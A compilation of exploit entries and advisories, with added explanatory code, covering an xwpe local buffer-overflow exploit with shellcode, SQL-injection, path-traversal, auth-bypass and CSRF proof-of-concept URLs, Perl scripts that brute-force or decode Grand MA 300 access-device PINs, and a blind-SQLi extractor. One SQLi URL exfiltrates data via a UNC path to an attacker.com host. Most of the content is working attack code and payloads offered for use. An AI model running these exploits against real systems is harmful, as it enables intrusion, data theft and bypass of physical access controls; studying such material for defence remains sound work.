#21 0x0809927d in ?? ()
#22 0x0806b23c in ?? ()
#23 0x08055c78 in ?? ()
#24 0x080565b5 in ?? ()
#25 0x080574aa in ?? ()
#26 0x0804b8b8 in ?? ()
#27 0xb7ddca63 in __libc_start_main (main=0x804b570, argc=0x2,
argv=0xbffff664, init=0x809a060, fini=0x809a050, rtld_fini=0xb7fedc90
<_dl_fini>, stack_end=0xbffff65c) at libc-start.c:287
#28 0x08049ea1 in ?? ()

import os, subprocess, sys
def run():
  try:
    print "# xwpe Buffer Overflow by Juan Sacco"
    print "# It's AGAIN Fuzzing time on unusable exploits"
    print "# This exploit is for educational purposes only"
    # JUNK + SHELLCODE + NOPS + EIP

    junk = "\x41"*262
    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
    nops = "\x90"*124
    eip = "\x50\xd1\xff\xbf"
    subprocess.call(["xwpe",' ', junk + shellcode + nops + eip])

  except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "Sorry, xwpe not found!"
    else:
        print "Error executing exploit"
    raise

def howtousage():
  print "Snap! Something went wrong"
  sys.exit(-1)

if __name__ == '__main__':
  try:
    print "Exploit xWPE Local Overflow Exploit"
    print "Author: Juan Sacco"
  except IndexError:
    howtousage()
run()
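Both exploits above locate the saved return address by watching which bytes land in EIP: the HtmlConverter one hard-codes an offset of 2469 after "RRRR" showed up as EIP 0x52525252, the xwpe one uses a "DCBA" marker under gdb. The following is an added example, not part of either advisory, showing the general way to get that offset in one run with a cyclic pattern, and then the JUNK + return address + NOP sled + shellcode layout both exploits build. The `b'\xcc'` shellcode and the return address passed to `build_payload` are placeholders; nothing here is specific to either target.

```python
"""Cyclic-pattern offset finding and payload layout (added example)."""
import string
import struct


def pattern_create(length):
    """Metasploit-style pattern (Aa0Aa1...): every 4-byte window is unique
    for the first 26*26*10*3 = 20280 bytes; longer requests are capped there."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern, eip_value):
    """Offset in the pattern of the 4 bytes that ended up in EIP.

    EIP is read as a little-endian 32-bit value, so 0x41306141 means the
    bytes 'A','a','0','A' were at the overwritten return address."""
    return pattern.find(struct.pack('<I', eip_value))


def build_payload(offset, ret_addr, shellcode, nop_sled=10):
    """JUNK + return address + NOP sled + shellcode, the layout used above.

    The return address is packed little-endian; with a JMP ESP gadget
    there, execution continues in the NOP sled right after it."""
    return (b'A' * offset
            + struct.pack('<I', ret_addr)
            + b'\x90' * nop_sled
            + shellcode)


if __name__ == '__main__':
    # Constructed demonstration: pretend the crash reported EIP 0x61413061.
    pat = pattern_create(3000)
    off = pattern_offset(pat, 0x61413061)
    print('offset to saved return address:', off)
    # Placeholder shellcode (int3) and placeholder gadget address.
    print(len(build_payload(off, 0x41414141, b'\xcc')), 'bytes')
```

In practice: run the target once with `pattern_create(n)` for an `n` past the suspected buffer size, read EIP from the debugger, feed it to `pattern_offset`, then confirm with a marker (four identical bytes at that offset must read back as EIP, exactly as "RRRR" reads as 0x52525252 above) before dropping in the real return address.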
            
source: https://www.securityfocus.com/bid/69387/info

The KenBurner Slider plugin for WordPress is prone to an arbitrary file-download vulnerability.

An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. 

http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php 
            
source: https://www.securityfocus.com/bid/69422/info

Spider Video Player extension for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker may leverage this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Spider Video Player Extension 2.8.3 is vulnerable; other versions may also be affected. 

http://www.example.com/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1' 
            
source: https://www.securityfocus.com/bid/69390/info
 
Grand MA 300 is prone to multiple security weaknesses.
 
Attackers can exploit these issues to disclose the access pin by sniffing network traffic or perform brute-force attacks on pin to gain unauthorized access. This may aid in other attacks.
 
Grand MA 300 running firmware version 6.60 is vulnerable. 

#!/usr/bin/perl
#
# This brute-forces the pin of a Grand MA 300 Fingerprint
# Access device in less than 5 minutes, if the pin
# is between 1 and 4294967296.
#
# written by Eric Sesterhenn <eric.sesterhenn () lsexperts de>
# http://www.lsexperts.de
#
use IO::Socket::INET;
use strict;
use warnings;

sub hexd {
        my ($data) = @_;
        my $ret = "";
        for (my $i=0; $i<length($data); $i++) {
                $ret .= sprintf "%X", ord(substr($data, $i, 1));
        }
        return $ret;
}
sub getword {
        my ($data, $offset) = @_;
        my $ret = 0;

        $ret = ord(substr($data, $offset, 1));
        $ret += 0x100 * ord(substr($data, $offset+1, 1));
        return $ret;
}

sub makeword {
        my ($value) = @_;

        my $ret = chr(($value & 0xFF)) . chr((($value >> 8) & 0xFF));

        return $ret;
}

sub calccrc {
        my ($packet) = @_;
        # we pad with zero for packets of uneven length
        my $newpacket = substr($packet, 0, 2) . substr($packet, 4) . chr(0);
        my $crc = 0;

        # the crc is the sum of all words in the packet
        for (my $i = 0; $i<length($packet) - 2; $i += 2) {
                $crc += getword($newpacket, $i);
        }

        # if the result is to big, we add the high bits to the lower bits
        while ($crc > 0xFFFF) {
                $crc = ($crc & 0xFFFF) + ($crc >> 0x10);
        }

        # negate the checksum
        $crc = ~$crc & 0xFFFF;
        return $crc;
}

sub makepacket {
        my ($type, $cid, $seqno, $data) = @_;
        my $crc = calccrc(makeword($type).makeword(0).makeword($cid).makeword($seqno).$data);
        return makeword($type).makeword($crc).makeword($cid).makeword($seqno).$data;
}

sub calcpass {
        my ($pin, $cid) = @_;
        my $ret = 0;

        # revert the bits
        for (my $i = 0; $i < 32; $i++) {
          $ret *= 2;
          if ($pin & 1) {
            $ret = $ret + 1;
          }
          $pin = $pin / 2;
        }

        $ret += $cid;

        # xor with magic value
        $ret ^= 0x4F534B5A;

        # switch the words
        $ret = (($ret & 0xFFFF) << 16) + ($ret >> 16);

        # xor all, but third byte with last byte of gettickcount
        my $gc = 0x00;
        $ret ^= $gc + ($gc << 8) + ($gc << 24);

        # set third byte to last byte of gettickcount
        # this weakens the algorithm even further, since this byte
        # is no longer relevant to the algorithm
        $ret = ($ret & 0xFF000000) + ($gc << 16) + ($ret & 0xFFFF);
        
        return $ret;
}

# flush after every write
local $| = 1;

my ($socket,$client_socket);

# creating object interface of IO::Socket::INET modules which internally creates
# socket, binds and connects to the TCP server running on the specific port.

my $data;
$socket = new IO::Socket::INET (
        PeerHost => '192.168.1.201',    # CHANGEME
        PeerPort => '4370',
        Proto => 'udp',
) or die "ERROR in Socket Creation : $!\n";

# initialize the connection
$socket->send(makepacket(1000, 0, 0, ""));
$socket->recv($data, 1024);

my $typ = getword($data, 0);
my $cid = getword($data, 4);
if ($typ != 2005) {
        printf("Client does not need a password");
        exit(-1);
}

for (my $i = 0; $i < 65536; $i++) {
        if (($i % 10) == 0) { printf "$i\n"; }
        my $pass = calcpass($i, $cid);
        $socket->send(makepacket(1102, $cid, $i + 1, pack("V", $pass)));

        $socket->recv($data, 1024);
        $typ = getword($data, 0);
        if ($typ == 2000) {
                printf("Found pin: %d\n", $i);
                exit(0);
        }
}

# disconnect
$socket->send(makepacket(1001, $cid, 2, ""));

$socket->close();
            
source: https://www.securityfocus.com/bid/69390/info

Grand MA 300 is prone to multiple security weaknesses.

Attackers can exploit these issues to disclose the access pin by sniffing network traffic or perform brute-force attacks on pin to gain unauthorized access. This may aid in other attacks.

Grand MA 300 running firmware version 6.60 is vulnerable. 

#!/usr/bin/perl
#
# This script calculates the original pin based on the pin
# retrieved on the wire for the Grand MA 300 fingerprint access device
#
# look for a UDP packet starting with 0x4E 0x04, the last 4 bytes are the
# encoded pin
#
# written by Eric Sesterhenn <eric.sesterhenn () lsexperts de>
# http://www.lsexperts.de
#
use warnings;
use strict;

my $cid = 0;     # connection id
my $ret = 0x4B00A987; # pin on the wire

# get gettickcount value (third byte)
my $gc = ($ret >> 16) & 0xFF;

# set third byte to magic value (so it becomes zero when we xor it later with the magic value)
$ret =  $ret | 0x005A0000;

# xor all, but third byte with last byte of gettickcount
$ret ^= $gc + ($gc << 8) + ($gc << 24);

# switch the words
$ret = (($ret & 0xFFFF) << 16) + ($ret >> 16);

# xor with magic value
$ret ^= 0x4F534B5A;

# subtract the connection id
$ret -= $cid;

my $fin = 0;
# revert the bits
for (my $i = 0; $i < 32; $i++) {
  $fin *= 2;
  if ($ret & 1) {
    $fin = $fin + 1;
  }
  $ret = $ret / 2;
}

printf("final: %X \n", $fin);
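The two scripts above split the PIN transform in two: the brute-forcer implements the forward direction (calcpass) and the recovery script implements the inverse on one captured value. The following is an added example, not part of the advisory, that puts encoder, decoder and the packet checksum side by side so the round trip can be checked; the constant 0x4F534B5A, the packet fields, the 1000/1001/1102 command codes and the 2000/2005 replies are the ones used by the scripts. One detail differs from the recovery script: the byte that the protocol overwrites with the tick count is put back from the low byte of the connection id instead of OR-ing in 0x5A. For cid 0 (what the script hard-codes) both give the same answer; the form used here also works for other connection ids, as long as the PIN is below 2**24, which is exactly the range in which the lost byte carries no PIN bits.

```python
"""Grand MA 300 PIN obfuscation and packet format (added example)."""
import struct

MAGIC = 0x4F534B5A
MASK32 = 0xFFFFFFFF
CMD_CONNECT, CMD_DISCONNECT, CMD_AUTH = 1000, 1001, 1102
ACK_OK, ACK_UNAUTH = 2000, 2005


def bit_reverse32(v):
    """Reverse the 32 bits of v (bit 0 becomes bit 31)."""
    r = 0
    for _ in range(32):
        r = (r << 1) | (v & 1)
        v >>= 1
    return r


def encode_pin(pin, cid, tick=0):
    """Forward transform, as the brute-forcer sends it.

    cid is the connection id the device hands out; tick stands for the low
    byte of GetTickCount() on the client, which ends up in byte 2 of the
    result in place of the data that was there."""
    v = (bit_reverse32(pin) + cid) & MASK32
    v ^= MAGIC
    v = ((v & 0xFFFF) << 16) | (v >> 16)                 # swap the 16-bit halves
    v ^= tick | (tick << 8) | (tick << 24)                # xor bytes 0, 1 and 3 with tick
    return (v & 0xFF000000) | (tick << 16) | (v & 0xFFFF)  # byte 2 := tick


def decode_pin(wire, cid=0):
    """Inverse transform for a captured value; exact for PINs below 2**24.

    Byte 2 of the wire value is the tick, so one byte of the intermediate is
    lost. That byte is the low byte of bit_reverse32(pin) + cid, and for
    PINs below 2**24 bit_reverse32(pin) has a zero low byte, so the lost
    byte must equal cid & 0xFF and can simply be put back."""
    tick = (wire >> 16) & 0xFF
    v = wire ^ (tick | (tick << 8) | (tick << 24))
    v = ((v & 0xFFFF) << 16) | (v >> 16)                 # undo the swap
    v ^= MAGIC
    v = (v & 0xFFFFFF00) | (cid & 0xFF)                  # restore the lost byte
    v = (v - cid) & MASK32
    return bit_reverse32(v)


def checksum(body):
    """One's-complement sum of 16-bit little-endian words, zero-padded to even length.

    body is the packet with the 2-byte checksum field removed."""
    if len(body) % 2:
        body += b'\x00'
    total = sum(struct.unpack('<%dH' % (len(body) // 2), body))
    while total > 0xFFFF:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def make_packet(ptype, cid, seq, data=b''):
    """type(2) checksum(2) cid(2) seq(2) data, all little-endian."""
    body = struct.pack('<HHH', ptype, cid, seq) + data
    return struct.pack('<HH', ptype, checksum(body)) + struct.pack('<HH', cid, seq) + data


def parse_header(pkt):
    """Return (type, checksum, cid, seq) of a packet."""
    return struct.unpack_from('<HHHH', pkt, 0)


def packet_ok(pkt):
    """True if the checksum field matches the rest of the packet."""
    return parse_header(pkt)[1] == checksum(pkt[:2] + pkt[4:])


def auth_packet(pin, cid, seq, tick=0):
    """The 1102 packet the brute-forcer sends for one PIN guess."""
    return make_packet(CMD_AUTH, cid, seq, struct.pack('<I', encode_pin(pin, cid, tick)))


def pin_from_capture(pkt):
    """Recover the PIN from a sniffed 1102 packet without any brute force."""
    ptype, _, cid, _ = parse_header(pkt)
    if ptype != CMD_AUTH:
        raise ValueError('not an authentication packet')
    return decode_pin(struct.unpack('<I', pkt[-4:])[0], cid)


if __name__ == '__main__':
    # The value used in the recovery script above, cid 0.
    print('0x4B00A987 ->', decode_pin(0x4B00A987))
    # Constructed capture: same PIN, non-zero cid and tick; the cid comes from the header.
    print('round trip ->', pin_from_capture(auth_packet(11111, 0x0BAD, 7, tick=0x33)))
```

The sniffing attack and the brute force are the same weakness seen from two sides: because the transform is a fixed bijection plus one discarded byte, a single captured 1102 packet gives the PIN directly, and the 16-bit search space the brute-forcer walks is small enough that no capture is needed.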
            
source: https://www.securityfocus.com/bid/69307/info

ArticleFR is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ArticleFR 3.0.4 is vulnerable; prior versions may also be affected. 

http://www.example.com/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202 
            
source: https://www.securityfocus.com/bid/69303/info

ManageEngine Password Manager Pro and ManageEngine IT360 are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

The following products are affected:

ManageEngine Password Manager Pro 5 through 7 build 7003
ManageEngine IT360 8 through 10.1.1 build 10110 

www.example.com/MetadataServlet.dat?sv=[SQLi]
www.example.com/console/MetadataServlet.dat?sv=[SQLi]







>> Blind SQL injection in ManageEngine Desktop Central, Password Manager Pro and IT360 (including MSP versions)
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 19/08/2014 / Last updated: 05/02/2015

>> Background on the affected products:
"Desktop Central is an integrated desktop & mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more."

"Password Manager Pro is a secure vault for storing and managing shared sensitive information such as passwords, documents and digital identities of enterprises."

"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration."

These products have managed service providers (MSP) versions which are used to control the desktops and smartphones of several clients.
Quoting the author of the Internet Census 2012: "As a rule of thumb, if you believe that "nobody would connect that to the Internet, really nobody", there are at least 1000 people who did." 
These vulnerabilities can be abused to achieve remote code execution as SYSTEM in Windows or as the user in Linux. Needless to say, owning a Desktop Central / IT360 box will give you control of all the computers and smartphones it manages, while owning Password Manager Pro will give you a treasure trove of passwords.

>> Technical details:
The two blind SQL injections described below have been present in Desktop Central, Password Manager Pro and IT360 in all releases since 2006. They can only be triggered via a GET request, which means you can only inject around 8000 characters at a time.

#1 
Vulnerability: 
Blind SQL injection in LinkViewFetchServlet (unauthenticated on DC/PMP / authenticated on IT360)
CVE-2014-3996

Affected products / versions:
- ManageEngine Desktop Central (DC) [MSP]: all versions from v4 up to v9 build 90033
- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002
- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
This affects all versions of the products released since 19-Apr-2006. Other ManageEngine products might be affected.
Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330

Constraints: 
- DC: no authentication or any other information needed
- PMP: no authentication or any other information needed
- IT360: valid user account needed

Proof of concept:

DC / PMP:
GET /LinkViewFetchServlet.dat?sv=[SQLi]

IT360:
GET /console/LinkViewFetchServlet.dat?sv=[SQLi]


#2
Vulnerability: 
Blind SQL injection in MetadataServlet (unauthenticated on PMP / authenticated on IT360) 
CVE-2014-3997

Affected products / versions:
- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002
- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
This affects all versions of the products released since 03-Apr-2008. Other ManageEngine products might be affected.
Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330

Constraints: 
- PMP: no authentication or any other information needed
- IT360: valid user account needed

Proof of concept:

PMP:
GET /MetadataServlet.dat?sv=[SQLi]

IT360:
GET /console/MetadataServlet.dat?sv=[SQLi]

================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
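Both injections above (the BID 69303 summary and the full advisory) are blind: the servlet never returns query output, only a response that differs depending on whether the injected condition held. The following is an added Python example, not code from the advisory or from ManageEngine, showing how such a bug is exploited and how it is fixed. The backend is a constructed in-memory SQLite database with an assumed table layout (linkview, aaauser) and an assumed query shape; ManageEngine's real schema, query and database engine are not on the page. The extractor binary-searches each character's code point through the true/false oracle, which is why the advisory's 8000-character GET limit is not a practical obstacle: every request carries only a short condition.

```python
import sqlite3
import urllib.parse


# Constructed in-memory stand-in for the servlet's backend; not ManageEngine's real schema or query.
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE linkview (sv TEXT, url TEXT);
        INSERT INTO linkview VALUES ('1', 'http://intranet/report1');
        CREATE TABLE aaauser (name TEXT, password TEXT);
        INSERT INTO aaauser VALUES ('admin', 's3cr3t!');
    """)
    return db


def vulnerable_servlet(db: sqlite3.Connection, sv: str) -> bool:
    """Models LinkViewFetchServlet/MetadataServlet: sv is concatenated into the SQL (the bug).
    Returns True when the response would contain a row and False otherwise; that one bit is
    the only signal a blind injection gets, since query results are never echoed back."""
    try:
        rows = db.execute(f"SELECT url FROM linkview WHERE sv='{sv}'").fetchall()
    except sqlite3.Error:
        return False
    return len(rows) > 0


def fixed_servlet(db: sqlite3.Connection, sv: str) -> bool:
    """The corrected version: sv travels as a bound parameter, never as SQL text."""
    rows = db.execute("SELECT url FROM linkview WHERE sv=?", (sv,)).fetchall()
    return len(rows) > 0


def poc_url(host: str, sv: str, path: str = "/LinkViewFetchServlet.dat") -> str:
    """The GET request the advisory describes, with the injected condition URL-encoded."""
    return f"http://{host}{path}?sv=" + urllib.parse.quote(sv, safe="")


def blind_extract(oracle, subquery: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction.

    For each position, binary-search the code point of that character with conditions of the
    form "... AND unicode(substr(<subquery>, pos, 1)) > mid": seven requests per character
    instead of up to ~95 guesses. Extraction stops once substr() runs past the end of the
    value, because unicode('') is NULL in SQLite, the comparison is never true and the search
    collapses to 0.
    """
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"1' AND (SELECT unicode(substr(({subquery}),{pos},1))) > {mid} -- "
            if oracle(cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


# Assumed target for the demo; the real products' credential tables are not described on the page.
ADMIN_PASSWORD_SUBQUERY = "SELECT password FROM aaauser WHERE name='admin'"

if __name__ == "__main__":
    db = make_db()
    print(poc_url("target", "1' AND 1=1 -- "))
    print(blind_extract(lambda sv: vulnerable_servlet(db, sv), ADMIN_PASSWORD_SUBQUERY))
    print(repr(blind_extract(lambda sv: fixed_servlet(db, sv), ADMIN_PASSWORD_SUBQUERY)))
```

Against a live target the oracle lambda becomes an HTTP GET of poc_url(...) whose result is classified by status code, body length or response time; the per-character search and the stop condition stay the same. Note that the fixed servlet still "answers" the injected strings, but treats them as a literal sv value, so the extractor recovers nothing.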
            
source: https://www.securityfocus.com/bid/69028/info

Barracuda Web Application Firewall is prone to an authentication-bypass vulnerability.

An attacker can exploit this issue to bypass the authentication mechanism and gain access to the appliance. This may aid in further attacks.

Barracuda Web Application Firewall 7.8.1.013 is vulnerable; other versions may also be affected. 

http://www.example.com/cgi-mod/index.cgi?auth_type=Local&et=99999999996&locale=en_US&password=5a2fd48b65c5d80881eeb0f738bcc6dc&primary_tab=SECURITY%20POLICIES&secondary_tab=request_limits&user=guest 
            
source: https://www.securityfocus.com/bid/69386/info

MyAwards module for MyBB is prone to a cross-site request-forgery vulnerability.

An attacker may exploit this issue to perform certain unauthorized actions. This may lead to further attacks.

Versions prior to MyAwards 2.4 are vulnerable. 

https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1
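The two URLs above delete a user's award through a plain GET that carries nothing but the admin's session cookie, which the browser attaches automatically, so any page the admin visits can trigger them. The following is an added Python example, not MyBB's or the MyAwards module's code, contrasting that handler with one that only acts on a POST carrying a per-session anti-CSRF key. The award store, the HMAC-based key derivation and the parameter name my_post_key (borrowed from MyBB's convention) are assumptions for the demo.

```python
import hmac
import hashlib
import secrets

# Assumption: a per-installation secret held only by the server.
SERVER_SECRET = secrets.token_bytes(32)


def post_key(session_id: str) -> str:
    """Per-session anti-CSRF key bound to the session under the server secret. A forging site
    cannot compute it: it never sees the secret, and the browser auto-attaches only the session
    cookie, never this value."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


class AwardsAdmin:
    """Constructed award store keyed by (id, awid, awuid), the parameters of the PoC URLs above."""

    def __init__(self):
        self.user_awards = {(1, 1, 2): "Helpful member"}

    def delete_user_award_vulnerable(self, session_id: str, method: str, params: dict) -> bool:
        """Pre-2.4 behaviour: any request arriving with an admin session deletes, so a cross-site
        <img src="...awards_delete_user&id=1&awid=1&awuid=2"> fetched by the admin is enough."""
        key = (int(params["id"]), int(params["awid"]), int(params["awuid"]))
        return self.user_awards.pop(key, None) is not None

    def delete_user_award_fixed(self, session_id: str, method: str, params: dict) -> bool:
        """State changes only via POST with a valid per-session key, compared in constant time."""
        if method != "POST":
            return False
        supplied = params.get("my_post_key", "")
        if not hmac.compare_digest(supplied.encode(), post_key(session_id).encode()):
            return False
        key = (int(params["id"]), int(params["awid"]), int(params["awuid"]))
        return self.user_awards.pop(key, None) is not None


def forged_request() -> tuple:
    """What a cross-site page can make the victim's browser send: the PoC parameters with the
    admin's cookie attached, but without the admin's post key."""
    return ("GET", {"module": "user-awards", "action": "awards_delete_user",
                    "id": "1", "awid": "1", "awuid": "2"})


if __name__ == "__main__":
    method, params = forged_request()
    print(AwardsAdmin().delete_user_award_vulnerable("sess-A", method, params))   # deleted
    print(AwardsAdmin().delete_user_award_fixed("sess-A", method, params))        # refused
```

A forged auto-submitting POST form fares no better against the fixed handler: the attacker would have to guess a 256-bit HMAC, and a key minted for a different session is rejected too.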